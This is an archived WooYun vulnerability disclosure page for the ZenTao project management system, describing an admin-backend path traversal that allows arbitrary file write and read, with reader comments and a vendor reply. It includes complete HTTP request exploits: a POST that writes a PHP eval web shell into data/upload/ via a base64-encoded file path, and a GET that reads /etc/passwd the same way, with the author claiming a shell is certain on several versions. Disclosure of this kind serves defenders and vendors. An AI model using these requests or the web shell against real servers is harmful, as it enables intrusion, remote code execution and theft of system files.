当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(30) 关注此漏洞

缺陷编号: WooYun-2014-76130

漏洞标题: 禅道漏洞第二弹后台读写任意文件/getshell

相关厂商: 禅道

漏洞作者: papaver

提交时间: 2014-09-17 18:48

公开时间: 2014-12-14 18:50

漏洞类型: 文件上传导致任意代码执行

危害等级: 高

自评Rank: 20

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 任意文件上传 任意文件上传

10人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-09-17: 细节已通知厂商并且等待厂商处理中
2014-09-20: 厂商已经确认,细节仅向厂商公开
2014-09-23: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2014-11-14: 细节向核心白帽子及相关领域专家公开
2014-11-24: 细节向普通白帽子公开
2014-12-04: 细节向实习白帽子公开
2014-12-14: 细节向公众公开

简要描述:

说好的禅道漏洞第二弹,不过跟第一个一样,还是有利用条件,那就是进入后台了
多少有些鸡肋,但是危害很大

详细说明:

漏洞1: 任意文件写入漏洞 自评风险:严重

问题出在这里

QQ20140913-4@2x.jpg



这里新建方法的时候,其实会写到限定目录的,限定后是无法访问的所以这里,即使成功写也无法利用。不过,我们能跳出它的限制



老规矩,看poc

POST /zd/www/index.php?m=editor&f=save&filePath=L3Zhci93d3cvemQvd3d3L2RhdGEvdXBsb2FkLzEucGhw&action=newPage HTTP/1.1

Host: **.**.**.**:81

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: http://**.**.**.**:81/zd/www/index.php?m=editor&f=edit&filePath=L3Zhci93d3cvemQvbW9kdWxlL2luc3RhbGwvZXh0L2NvbnRyb2wvaW5mby5waHA=&action=newPage&isExtends=

Cookie: lang=zh-cn; theme=default; windowWidth=700; windowHeight=612; keepLogin=on; za=admin; zp=478204cc9b8ad76200072d66a6183562dfb90781; sid=onfa3enukp3ib1burp2hvrobe6

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 46



fileContent=<?php@eval($_POST['test']);?>



filePath 的值其实是目标文件的base64的编码值,所以,这里只要修改下就可以搞定了,当然,你得找个既能写入又能访问的目录,明显,data/upload/就是我们要的

QQ20140915-1@2x.jpg



QQ20140915-2@2x.jpg



直接拿到后门了。是不是很简单,别问我怎么得到物理路径的,随便到处都是,编辑的地方都有。





漏洞2:读文件 自评风险:高危

这个其实根据上面那个发现方法一样,利用方法也一样,只是这次换成读任意文件。

看poc:



QQ20140915-3@2x.jpg





GET /zd/www/index.php?m=editor&f=edit&filePath=L2V0Yy9wYXNzd2Q=&action=override&isExtends= HTTP/1.1

Host: **.**.**.**:81

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: http://**.**.**.**:81/zd/www/index.php?m=editor&f=extend&moduleDir=install

Cookie: lang=zh-cn; theme=default; windowWidth=700; windowHeight=612; keepLogin=on; za=admin; zp=478204cc9b8ad76200072d66a6183562dfb90781; sid=onfa3enukp3ib1burp2hvrobe6

Connection: keep-alive



L2V0Yy9wYXNzd2Q= 这个就是/etc/passwd的base64的值了

漏洞证明:

一直觉得这个证明的框有些多余,每个漏洞说明的时候其实就加上证明了。

个人测试了5.2 ,5.3 ,6.2 三个版本,都存在这个问题。只要你有后台权限,肯定拿shell的。

其中,url换成伪静态的时候远离也一样,那一长串就是目标文件的url的base64,记住这个就好了。

修复方案:

老生常谈了,限制限制还是限制,不能想读那个就读那个,想写那个就写那个啊,

版权声明:转载请注明来源 papaver@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2014-09-20 13:46

厂商回复:

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2014-09-15 19:38 | xsser 认证白帽子 ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)
    1

    后台还发钱啊

  2. 2014-09-15 19:40 | 袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:61 | 故乡的原风景.MP3)
    0

    @xsser 发钱你都不知道呀 -_-||

  3. 2014-09-15 19:57 | xsser 认证白帽子 ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)
    0

    @袋鼠妈妈 跟prize策略不一致啊

  4. 2014-09-16 12:00 | noob ( 实习白帽子 | Rank:85 漏洞数:19 | 向各位大神学习,向各位大神致敬)
    0

    正好缺这个..不能提前看么

  5. 2014-09-20 17:13 | U神 ( 核心白帽子 | Rank:1360 漏洞数:150 | 乌云核心菜鸟,联盟托管此号中,欢迎加入08...)
    0

    @xsser 发这种后台getshell的漏洞有助于渗透的朋友

  6. 2014-09-20 17:14 | xsser 认证白帽子 ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)
    0

    @U神 :(

  7. 2014-09-20 20:21 | 寂寞的瘦子 ( 普通白帽子 | Rank:242 漏洞数:53 | ☯☯☯☯☯☯☯☯☯☯)
    0

    @xsser 这个cms很吊的

  8. 2014-09-21 22:48 | 小胖胖要减肥 认证白帽子 ( 普通白帽子 | Rank:686 漏洞数:101 )
    0

    @finger 是不是应该发钱

  9. 2014-09-22 11:35 | papaver ( 普通白帽子 | Rank:198 漏洞数:36 | 95后,高一学生一枚... 萌萌哒..)
    0

    getshell 才11rank。。

  10. 2014-09-22 16:15 | 小胖胖要减肥 认证白帽子 ( 普通白帽子 | Rank:686 漏洞数:101 )
    0

    @papaver 后台

  11. 2014-12-14 22:21 | 路西法 ( 路人 | Rank:2 漏洞数:2 | 堕落天使路西法)
    1

    @xsser @papaver 这个貌似要后台最高权限才能出现这个扩展页面,其他用户貌似是看不到的.... 而且貌似这个可以上传插件(PHP文件)

  12. 2015-03-20 08:40 | 青岛易软天创网络科技有限公司(乌云厂商)
    0

    这个是禅道自身带的功能,可以在界面上对禅道的代码做简单的定制开发。只有超级管理员才能有这个权限。所以首要的是保护好超管的口令。

  13. 2015-09-13 00:58 | hack2012 ( 实习白帽子 | Rank:31 漏洞数:3 | 关注信息安全 http://www.waitalone.cn/)
    0

    7.2.5已经不行了,唉。

  14. 2015-12-05 15:36 | BeenQuiver ( 普通白帽子 | Rank:103 漏洞数:27 | 专注而高效,坚持好的习惯千万不要放弃)
    0

    禅道的路还很远

登录后才能发表评论,请先 登录